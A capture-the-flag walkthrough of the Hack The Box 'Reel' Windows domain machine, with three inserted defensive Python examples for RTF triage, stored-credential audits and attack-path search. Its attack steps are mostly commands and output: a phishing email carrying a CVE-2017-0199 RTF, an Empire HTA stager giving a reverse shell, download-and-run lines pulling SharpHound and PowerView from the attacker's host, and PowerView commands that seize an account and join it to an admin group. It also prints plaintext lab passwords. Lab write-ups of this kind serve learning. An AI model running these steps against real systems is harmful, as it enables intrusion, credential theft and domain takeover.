Reel

Target machine:
https://www.hackthebox.eu/home/machines/profile/143
nmap -v -A -sV -sC 10.10.10.77
This is a Windows Server 2012 R2 box with SSH, FTP and SMTP services and Active Directory Domain Services.
The scan results show that anonymous FTP login is allowed.

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18  11:19PM       <DIR>          documents
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh          OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
|   256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_  256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp    open  smtp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe: 
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|   Hello: 
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help: 
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions: 
|     220 Mail Service ready
|     sequence of commands
|_    sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP, 
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49159/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?
Host script results:
|_clock-skew: mean: -47s, deviation: 2s, median: -49s
| smb-os-discovery: 
|   OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: REEL
|   NetBIOS computer name: REEL\x00
|   Domain name: HTB.LOCAL
|   Forest name: HTB.LOCAL
|   FQDN: REEL.HTB.LOCAL
|_  System time: 2019-01-21T03:35:22+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2019-01-21 11:35:20
|_  start_date: 2019-01-21 07:54:45

Log in to FTP anonymously and download everything with mget *. There are three files: AppLocker.docx, readme.txt and Windows Event Forwarding.docx.

$ ftp
ftp> open
(to) 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:Rogerd): Anonymous 
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-28-18  11:19PM       <DIR>          documents
ftp> cd documents
250 CWD command successful.
ftp> mget *
mget AppLocker.docx? 
200 PORT command successful.

cat readme.txt

please email me any rtf format procedures - I'll review and convert.

new format / converted documents will be saved here.

So we need to craft an email carrying an RTF file, and for that we still need to find an email address.

Look at the other two Word documents. One of them does not open directly, so we inspect its metadata instead, which reveals an email address:
exiftool Windows\ Event\ Forwarding.docx

ExifTool Version Number         : 11.16
File Name                       : Windows Event Forwarding.docx
Directory                       : .
File Size                       : 14 kB
File Modification Date/Time     : 2019:01:21 12:01:36+08:00
File Access Date/Time           : 2019:01:21 13:00:24+08:00
File Inode Change Date/Time     : 2019:01:21 12:01:36+08:00
File Permissions                : rw-r--r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x82872409
Zip Compressed Size             : 385
Zip Uncompressed Size           : 1422
Zip File Name                   : [Content_Types].xml
Creator                         : [email protected]

Open AppLocker.docx: AppLocker is enabled, with hash rules in effect for executables, MSI files and scripts (.ps1, .vbs, .cmd, .bat).

AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.

We try sending mail to [email protected] and listen on a port to see whether the target calls back.
We use the Exploit toolkit CVE-2017-0199 Microsoft Office RCE, which generates malicious RTF / PPSX files:
https://github.com/bhdresh/CVE-2017-0199
Serve the callback with Python:

python -m SimpleHTTPServer 8000

Use the CVE-2017-0199 Python script to generate the RTF that will be sent to the mailbox found above:

python cve-2017-0199_toolkit.py -M gen -t RTF -w TEST.RTF -u http://10.10.14.19:8000/reel.hta

Send the mail with sendEmail:

sendEmail -f [email protected] -t [email protected] -u RTF -m 'open file!' -a TEST.RTF -s 10.10.10.77

We can see that port 8000 was successfully accessed.

Empire is a tool for managing PowerShell sessions.
We use Empire to generate an HTA, place it in the tmp directory and serve it with Python's HTTP server; when the recipient opens TEST.RTF, the document fetches the HTA we generated in advance from our server.
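The document described above works because the RTF carries a linked OLE object that is told to refresh itself from a remote URL when the file is opened. Added example (not the toolkit's code and not from the original post): a small triage routine a mail gateway or incident responder can run over an RTF attachment to flag that structure. The two RTF samples are constructed stubs; the control words checked (\object, \objautlink, \objupdate, \*\objdata) come from the RTF specification, and the "OLE2Link" class name in the decoded object data is the marker such documents carry. The verdict thresholds are my own choice.

```python
import re

# Constructed sample 1: a stub RTF in the shape of a CVE-2017-0199 document: a linked
# OLE object (\objautlink) told to refresh itself on open (\objupdate), whose \objdata
# carries the "OLE2Link" class name. The actual link target and payload are omitted.
SAMPLE_LINKED_RTF = (
    rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}"
    rb"{\object\objautlink\objupdate\rsltpict\objw100\objh100"
    rb"{\*\objclass Word.Document.8}"
    rb"{\*\objdata 01050000 02000000 09000000 4f4c45324c696e6b 00000000}"
    rb"{\result{\pict\wmetafile8 0100}}}\par}"
)

# Constructed sample 2: an ordinary procedure document with no embedded objects.
SAMPLE_PLAIN_RTF = rb"{\rtf1\ansi\deff0 Backup procedure: run the nightly job.\par}"

OBJDATA_RE = re.compile(rb"\\\*\\objdata\s+([0-9a-fA-F\s]+)")


def decode_objdata(data: bytes) -> bytes:
    """Hex-decode and concatenate every \\*\\objdata group in the RTF."""
    out = bytearray()
    for match in OBJDATA_RE.finditer(data):
        hexstr = re.sub(rb"\s+", b"", match.group(1))
        hexstr = hexstr[: len(hexstr) - len(hexstr) % 2]  # drop a dangling nibble
        out += bytes.fromhex(hexstr.decode("ascii"))
    return bytes(out)


def triage_rtf(data: bytes) -> dict:
    """Indicators a mail gateway can act on, plus an allow/review/block verdict."""
    lower = data.lower()
    blob = decode_objdata(data)
    findings = {
        "has_object": b"\\object" in lower,
        "auto_link": b"\\objautlink" in lower,
        "update_on_open": b"\\objupdate" in lower,
        "ole2link_class": b"OLE2Link" in blob,
        # Link targets appear as ASCII or UTF-16LE inside the decoded object data.
        "url_in_objdata": b"http" in blob.lower() or b"h\x00t\x00t\x00p\x00" in blob.lower(),
    }
    if (findings["auto_link"] and findings["update_on_open"]) or findings["ole2link_class"]:
        findings["verdict"] = "block"
    elif findings["has_object"]:
        findings["verdict"] = "review"
    else:
        findings["verdict"] = "allow"
    return findings


if __name__ == "__main__":
    for name, sample in (("linked", SAMPLE_LINKED_RTF), ("plain", SAMPLE_PLAIN_RTF)):
        print(name, triage_rtf(sample))
```

Any embedded object gets a human look ("review"); the combination of an auto-linked object that updates on open, or an OLE2Link class in the object data, has no legitimate use in a procedure document and is blocked outright.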

(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host http://10.10.10.14.19
(Empire: listeners/http) > execute
[*] Starting listener 'http'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!

(Empire: listeners/http) > back
(Empire: listeners) > usestager windows/hta
(Empire: stager/windows/hta) > set Listener http
(Empire: stager/windows/hta) > set OutFile /home/Rogerd/tools/CVE-2017-0199/reel.hta
(Empire: stager/windows/hta) > generate

[*] Stager output written out to: /home/Rogerd/tools/CVE-2017-0199/reel.hta

Move reel.hta into the tmp directory, start the web server again with python -m SimpleHTTPServer 8000, then resend the mail:
sendEmail -f [email protected] -t [email protected] -u RTF -m 'open file!' -a TEST.RTF -s 10.10.10.77

We now have the reverse shell.
The desktop contains several files; user.txt is the first flag.

(Empire: stager/windows/hta) > agents

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 G25L3MWT ps 10.10.10.77     REEL              HTB\nico                powershell         2468   5/0.0    2019-01-23 11:49:22

(Empire: agents) > interact G25L3MWT

Look at cred.xml: it is a saved PowerShell credential object used for remote administration.

(Empire: G25L3MWT) > shell Get-Content cred.xml
[*] Tasked G25L3MWT to run TASK_SHELL
[*] Agent G25L3MWT tasked with task ID 19
(Empire: G25L3MWT) > [*] Agent G25L3MWT returned results.
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">HTB\Tom</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
    </Props>
  </Obj>
</Objs>

..Command execution completed.

Through this cred.xml file we obtain tom's account information.
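The cred.xml above is the CliXML format that Export-Clixml writes. The UserName is stored in clear text, and the SecureString password is a DPAPI blob bound to the user and machine that saved it, which is exactly why a session running as that user can read it back with Import-Clixml. Added example (not from the original post, and not PowerShell's own code): a Python audit helper that lists PSCredential objects found in CliXML files, so a defender can find credentials left on disk before someone else does. The sample documents are constructed; the DPAPI prefix check relies on the provider GUID that the page's own blob also starts with.

```python
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
# Export-Clixml protects SecureStrings with DPAPI; the serialized blob starts with the
# DPAPI provider GUID (df9d8cd0-1501-11d1-8c7a-00c04fc297eb) in little-endian hex.
DPAPI_PROVIDER_PREFIX = "01000000d08c9ddf0115d1118c7a00c04fc297eb"
CONSTRUCTED_BLOB = DPAPI_PROVIDER_PREFIX + "00" * 16  # placeholder, not the blob from the box

# Constructed sample in the same CliXML shape as the cred.xml found on the box.
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">EXAMPLE\\svc_backup</S>
      <SS N="Password">%s</SS>
    </Props>
  </Obj>
</Objs>""" % CONSTRUCTED_BLOB

# Constructed sample of an unrelated CliXML export (no credential object inside).
SAMPLE_OTHER_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <S>just a string</S>
</Objs>"""


def find_stored_credentials(xml_text: str) -> list:
    """Return one record per PSCredential object serialized in a CliXML document."""
    ns = {"ps": PS_NS}
    root = ET.fromstring(xml_text)
    records = []
    for obj in root.iter("{%s}Obj" % PS_NS):
        type_names = [t.text for t in obj.findall("ps:TN/ps:T", ns)]
        if "System.Management.Automation.PSCredential" not in type_names:
            continue
        username = obj.findtext("ps:Props/ps:S[@N='UserName']", default="", namespaces=ns)
        blob = obj.findtext("ps:Props/ps:SS[@N='Password']", default="", namespaces=ns).strip()
        records.append({
            "username": username,
            # True means only the saving user on the saving host can decrypt it.
            "dpapi_protected": blob.lower().startswith(DPAPI_PROVIDER_PREFIX),
            "blob_bytes": len(blob) // 2,
        })
    return records


def summarize(files: dict) -> list:
    """files maps a path to its CliXML text; returns (path, username, dpapi) tuples to review."""
    hits = []
    for path, text in files.items():
        for rec in find_stored_credentials(text):
            hits.append((path, rec["username"], rec["dpapi_protected"]))
    return hits


if __name__ == "__main__":
    for hit in summarize({"C:/Users/example/cred.xml": SAMPLE_CLIXML, "other.xml": SAMPLE_OTHER_CLIXML}):
        print(hit)
```

In practice the input would come from walking user profile directories for *.xml files; every hit is a credential that any process running as that user can recover, so the fix is to remove the file and rotate the account it names.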

We can also run allchecks to enumerate further; its output shows the username and password nico uses for the SSH service.

(Empire: 7H9GMEV2) > usemodule privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > run
[*] Tasked 7H9GMEV2 to run TASK_CMD_JOB
[*] Agent 7H9GMEV2 tasked with task ID 26
[*] Tasked agent 7H9GMEV2 to run module powershell/privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > [*] Agent 7H9GMEV2 returned results.
Job started: 64FXBN
[*] Valid results returned by 10.10.10.77
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...

ServiceName    : ssh-agent
Path           : C:\Program Files\OpenSSH\ssh-agent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'ssh-agent' -Path <HijackPath>
CanRestart     : False

ServiceName    : ssh-agent
Path           : C:\Program Files\OpenSSH\ssh-agent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'ssh-agent' -Path <HijackPath>
CanRestart     : False

ServiceName    : sshd
Path           : C:\Program Files\OpenSSH\sshd.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : NT SERVICE\SSHD
AbuseFunction  : Write-ServiceBinary -Name 'sshd' -Path <HijackPath>
CanRestart     : False

ServiceName    : sshd
Path           : C:\Program Files\OpenSSH\sshd.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : NT SERVICE\SSHD
AbuseFunction  : Write-ServiceBinary -Name 'sshd' -Path <HijackPath>
CanRestart     : False

DefaultDomainName    : HTB
DefaultUserName      : nico
DefaultPassword      : 4dri@na2017!**
AltDefaultDomainName : 
AltDefaultUserName   : 
AltDefaultPassword   : 

[*] Checking for modifidable registry autoruns and configs...
[*] Checking for modifiable schtask files/configs...
[*] Checking for unattended install files...
UnattendPath : C:\Windows\Panther\Unattend.xml

We log in as tom over SSH:
ssh [email protected]
1ts-mag1c!!!

In tom -> Desktop -> AD Audit -> note.txt
the note hints that we should look for the shortest attack path.

Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.

There is also tom -> Desktop -> AD Audit -> BloodHound. Some background on it:
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.
Installing BloodHound:
https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/

Logged in as tom, we replace the SharpHound.ps1 file there (first copy SharpHound.ps1 from the downloaded BloodHound -> Ingestors directory into the web root served on port 8000):
powershell "IEX (New-Object Net.Webclient).DownloadFile('http://10.10.14.19:8000/SharpHound.ps1','SharpHound.ps1')"

Use SharpHound.ps1 to generate a report, which we will then download:
powershell -exec bypass
Import-Module ./SharpHound.ps1
invoke-bloodhound all

Download the generated report and drag it into BloodHound:
scp -P 22 [email protected]:"\"/C:/Users/tom/Desktop/AD Audit/BloodHound/Ingestors/20190124161418_BloodHound.zip\"" /tmp/
We can see 18 users and 61 groups in total.

We can inspect the different groups; here we look at backup_admin.
Search for [email protected],
set it as the starting node (tom)
and set backup_admin as the ending node.
The path shows that backup_admin is reachable through CLAIRE, and that tom has control over CLAIRE.

Right-click the WriteOwner edge and open help -> info for the details:
tom can change claire's owner, and claire has write permission on backup_admin.

The user [email protected] has the ability to modify the owner of the user [email protected]. Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.
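The shortest-path query BloodHound runs is an ordinary graph search over (principal, relationship, principal) edges. Added example (not BloodHound's code and not from the original post): a breadth-first search over a constructed edge list containing the two edges the page describes, tom -WriteOwner-> claire and claire -> backup_admin. "WriteDacl" is my assumed BloodHound name for claire's write permission on the group, and the MemberOf edges are added for contrast. Beyond the page's single path, it also lists every principal that can reach a chosen group and the ACL edges whose removal breaks the path, which is how a defender would use the same data.

```python
from collections import deque

# Constructed edge list in BloodHound's (source, relationship, target) shape. The two ACL
# edges are the ones the page describes; "WriteDacl" is the assumed BloodHound name for
# claire's write permission on the group, and the MemberOf edges are added for contrast.
EDGES = [
    ("TOM@HTB.LOCAL", "WriteOwner", "CLAIRE@HTB.LOCAL"),
    ("CLAIRE@HTB.LOCAL", "WriteDacl", "BACKUP_ADMINS@HTB.LOCAL"),
    ("TOM@HTB.LOCAL", "MemberOf", "DOMAIN USERS@HTB.LOCAL"),
    ("NICO@HTB.LOCAL", "MemberOf", "DOMAIN USERS@HTB.LOCAL"),
    ("CLAIRE@HTB.LOCAL", "MemberOf", "DOMAIN USERS@HTB.LOCAL"),
]

# Relationship types that come from an object's DACL rather than from group membership;
# these are the ones an administrator can remove to break a path.
ACL_EDGES = {"WriteOwner", "WriteDacl", "GenericAll", "GenericWrite", "Owns", "ForceChangePassword"}


def build_graph(edges):
    """Adjacency map: node -> list of (relationship, target)."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
        graph.setdefault(dst, [])
    return graph


def shortest_path(graph, start, end):
    """BFS over directed edges; returns the path as (src, rel, dst) triples, or None."""
    if start not in graph or end not in graph:
        return None
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == end:
            break
        for rel, nxt in graph[node]:
            if nxt not in parent:
                parent[nxt] = (node, rel)
                queue.append(nxt)
    if end not in parent:
        return None
    path = []
    node = end
    while parent[node] is not None:
        prev, rel = parent[node]
        path.append((prev, rel, node))
        node = prev
    return list(reversed(path))


def principals_reaching(graph, target):
    """Every node with some path to target: the audit list for a high-value group."""
    return sorted(n for n in graph if n != target and shortest_path(graph, n, target) is not None)


def acl_edges_to_remove(path):
    """The ACL relationships on a path; removing any one of them breaks the path."""
    return [(s, r, d) for s, r, d in path if r in ACL_EDGES]


if __name__ == "__main__":
    g = build_graph(EDGES)
    path = shortest_path(g, "TOM@HTB.LOCAL", "BACKUP_ADMINS@HTB.LOCAL")
    for src, rel, dst in path:
        print(f"{src} -[{rel}]-> {dst}")
    print("can reach the group:", principals_reaching(g, "BACKUP_ADMINS@HTB.LOCAL"))
    print("ACEs to clean up:", acl_edges_to_remove(path))
```

The note on the box said the default query found no path to Domain Admins and suggested re-running it against other groups; principals_reaching is that re-run for any group you pick as the target.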

So we take claire first and then backup_admin.
The help text suggests the approach: change the ownership with PowerView.

The PowerView documentation describes the functions we need:
Set-DomainObjectOwner sets the owner of an object.
Add-DomainObjectAcl writes an entry into an object's DACL.
Set-DomainUserPassword resets a user's password.

1. Make Tom the owner of the Claire object.
2. Grant Tom the right to reset Claire's password.
3. Change the password.

powershell -command "import-module .\PowerView.ps1; Set-DomainObjectOwner -Identity claire -OwnerIdentity Tom -Verbose; Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity Tom -Rights ResetPassword -Verbose; $pass=ConvertTo-SecureString "AbC!@#123" -AsPlainText -Force; Set-DomainUserPassword -Identity claire -AccountPassword $pass -Verbose"


Following the attack path, we add Claire to the Backup_Admins group.
PowerView.ps1 is not in the directory, so we download it from Kali:

powershell "IEX (New-Object Net.Webclient).DownloadFile('http://10.10.14.19:8000/PowerView.ps1','PowerView.ps1')"

powershell -command "import-module .\PowerView.ps1; Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity claire -Rights All -Verbose; Add-DomainGroupMember -Identity 'Backup_Admins' -Members 'claire' -Verbose"


Now we can access the Administrator -> Backup_Script folder,
but we still cannot read root.txt.
The Backup_Script directory contains several scripts; Backup_Script.ps1 is a backup script that contains the key information.

References:
https://www.anquanke.com/post/id/85695
https://www.knowsec.net/archives/238/
https://www.harmj0y.net/blog/powershell/make-powerview-great-again/
https://github.com/ama21n/powershell/blob/master/PowerView.ps1
